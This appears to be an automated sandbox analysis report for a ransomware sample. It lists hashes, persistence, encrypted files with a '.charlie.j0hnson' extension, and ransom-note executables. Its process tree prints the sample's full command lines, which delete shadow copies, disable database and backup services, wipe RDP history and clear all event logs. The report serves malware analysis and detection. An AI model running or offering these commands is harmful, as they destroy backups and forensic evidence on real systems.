Analysis
- max time kernel: 135s
- max time network: 136s
- platform: windows7_x64
- resource: win7v20201028
- submitted: 10/04/2021, 11:24
Static task: static1
Behavioral task: behavioral1
  Sample: CSRSS.Exe
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: CSRSS.Exe
  Resource: win10v20201028
General
- Target: CSRSS.Exe
- Size: 210KB
- MD5: 67438e8ddb537ef31fd86c5b046e986b
- SHA1: 0722038e02681bb4f1312b92bd62cd070476f3d6
- SHA256: d7f19de8eb2461c635c0170448a58a1ec6e6de014b4410883f87d0b5d7868e65
- SHA512: 31ba7615a173c84cd59152ed44d707ef81f37bba9d91bc9afb86d89cb6c99f4346cfdce272224f7c3e00f0b23ff930df7cc4285d63fc2185e50669ad8c5c7c39
Malware Config
Signatures
- Executes dropped EXE (1 IoC)
    pid  | Process
    1408 | HOW TO RETURN YOU FILES.exe
- Deletes itself (1 IoC)
    pid  | Process
    1484 | cmd.exe
- Reads user/profile data of web browsers (2 TTPs)
    Infostealers often target stored browser data, which can include saved credentials etc.
- Adds Run key to start application (2 TTPs, 2 IoCs)
    description     | ioc | Process
    Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\WindowsUpdateCheck = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CSRSS.Exe" | CSRSS.Exe
    Key created     | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce | CSRSS.Exe
- Enumerates connected drives (3 TTPs, 1 IoC)
    Attempts to read the root path of hard drives other than the default C: drive.
    description             | ioc    | Process
    File opened (read-only) | \??\Z: | CSRSS.Exe
- Drops file in Program Files directory (64 IoCs)
    description | ioc | Process
    File created | C:\Program Files\Java\jre7\lib\ext\HOW TO RETURN YOU FILES.exe | CSRSS.Exe
    File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\el-GR\HOW TO RETURN YOU FILES.exe | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\IEContentService.exe.charlie.j0hnson | CSRSS.Exe
    File created | C:\Program Files\Java\jre7\lib\cmm\HOW TO RETURN YOU FILES.exe | CSRSS.Exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-progress-ui.xml.charlie.j0hnson | CSRSS.Exe
    File created | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\HOW TO RETURN YOU FILES.exe | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Metro.thmx.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\32.png.charlie.j0hnson | CSRSS.Exe
    File created | C:\Program Files (x86)\Google\Update\Install\HOW TO RETURN YOU FILES.exe | CSRSS.Exe
    File opened for modification | C:\Program Files\Java\jre7\bin\jsound.dll.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01163_.WMF.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02062U.BMP.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-modules-appui.jar.charlie.j0hnson | CSRSS.Exe
    File created | C:\Program Files (x86)\Microsoft Office\HOW TO RETURN YOU FILES.exe | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107746.WMF.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\ENV98SP.POC.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\HOW TO RETURN YOU FILES.exe | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\TextConv\en-US\HOW TO RETURN YOU FILES.exe | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24Images.jpg.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Perth.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_ja.jar.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\PublicAssemblies\Microsoft.VisualStudio.Tools.Applications.Adapter.dll.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files\Java\jre7\lib\zi\Indian\Reunion.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files\Common Files\Microsoft Shared\VSTO\HOW TO RETURN YOU FILES.exe | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\COUPON.POC.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-modules-profiler_visualvm.jar.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V | CSRSS.Exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Resolute.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR43B.GIF.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\groove.net\ManagedObjects\HOW TO RETURN YOU FILES.exe | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Windows Media Player\wmplayer.exe.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01354_.WMF.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_bottom.png.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\js\controllers.js.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Discussion.css.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck\TAB_ON.GIF.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\in_sidebar\bg_sidebar.png.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0089945.WMF.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files\VideoLAN\VLC\plugins\access_output\libaccess_output_livehttp_plugin.dll.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png.charlie.j0hnson | CSRSS.Exe
    File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\HOW TO RETURN YOU FILES.exe | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\SLINTL.DLL.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0199727.WMF.charlie.j0hnson | CSRSS.Exe
    File created | C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\HOW TO RETURN YOU FILES.exe | CSRSS.Exe
    File created | C:\Program Files\Common Files\Microsoft Shared\OFFICE14\HOW TO RETURN YOU FILES.exe | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_bg.dll.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\AMERITECH.NET.XML.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\DEEPBLUE\THMBNAIL.PNG.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files\7-Zip\Lang\fr.txt.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.ja_5.5.0.165303.jar.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_ja_4.4.0.v20140623020002.jar.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsImageTemplate.html.charlie.j0hnson | CSRSS.Exe
    File created | C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\WSS\HOW TO RETURN YOU FILES.exe | CSRSS.Exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs.charlie.j0hnson | CSRSS.Exe
    File created | C:\Program Files (x86)\Common Files\microsoft shared\Web Server Extensions\HOW TO RETURN YOU FILES.exe | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME18.CSS.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Brussels.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-favorites.xml.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\LightSpirit.css.charlie.j0hnson | CSRSS.Exe
    File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\HOW TO RETURN YOU FILES.exe | CSRSS.Exe
- Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
    description                     | pid  | Process
    Token: SeBackupPrivilege        | 1336 | CSRSS.Exe
    Token: SeRestorePrivilege       | 1336 | CSRSS.Exe
    Token: SeManageVolumePrivilege  | 1336 | CSRSS.Exe
    Token: SeTakeOwnershipPrivilege | 1336 | CSRSS.Exe
- Suspicious use of SetWindowsHookEx (5 IoCs)
    pid  | Process
    1408 | HOW TO RETURN YOU FILES.exe
    1408 | HOW TO RETURN YOU FILES.exe
    1408 | HOW TO RETURN YOU FILES.exe
    1408 | HOW TO RETURN YOU FILES.exe
    1408 | HOW TO RETURN YOU FILES.exe
- Suspicious use of WriteProcessMemory (12 IoCs)
    description                     | pid  | Process   | procid_target
    PID 1336 wrote to memory of 1356 | 1336 | CSRSS.Exe | 26
    PID 1336 wrote to memory of 1356 | 1336 | CSRSS.Exe | 26
    PID 1336 wrote to memory of 1356 | 1336 | CSRSS.Exe | 26
    PID 1336 wrote to memory of 1356 | 1336 | CSRSS.Exe | 26
    PID 1336 wrote to memory of 772  | 1336 | CSRSS.Exe | 38
    PID 1336 wrote to memory of 772  | 1336 | CSRSS.Exe | 38
    PID 1336 wrote to memory of 772  | 1336 | CSRSS.Exe | 38
    PID 1336 wrote to memory of 772  | 1336 | CSRSS.Exe | 38
    PID 1336 wrote to memory of 1484 | 1336 | CSRSS.Exe | 40
    PID 1336 wrote to memory of 1484 | 1336 | CSRSS.Exe | 40
    PID 1336 wrote to memory of 1484 | 1336 | CSRSS.Exe | 40
    PID 1336 wrote to memory of 1484 | 1336 | CSRSS.Exe | 40
Processes
- C:\Users\Admin\AppData\Local\Temp\CSRSS.Exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\CSRSS.Exe"
  PID: 1336
  - Adds Run key to start application
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c @echo off vssadmin delete shadows /all /quiet sc config browser sc config browser start=enabled sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer sc config ReportServer start=disabled sc stop OracleServiceORCL sc config OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config OracleMTSRecoveryService start=disabled sc stop OracleVssWriterORCL sc config OracleVssWriterORCL start=disabled sc stop MySQL sc config MySQL start=disabled
    PID: 1356
  - C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c @echo off vssadmin Delete Shadows /all /quiet reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil cl "%1"
    PID: 772
  - C:\Windows\SysWOW64\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\CSRSS.Exe > nul
    PID: 1484
    - Deletes itself
- C:\Windows\explorer.exe
  Command line: "C:\Windows\explorer.exe"
  PID: 464
- C:\Users\Admin\Documents\HOW TO RETURN YOU FILES.exe
  Command line: "C:\Users\Admin\Documents\HOW TO RETURN YOU FILES.exe"
  PID: 1408
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx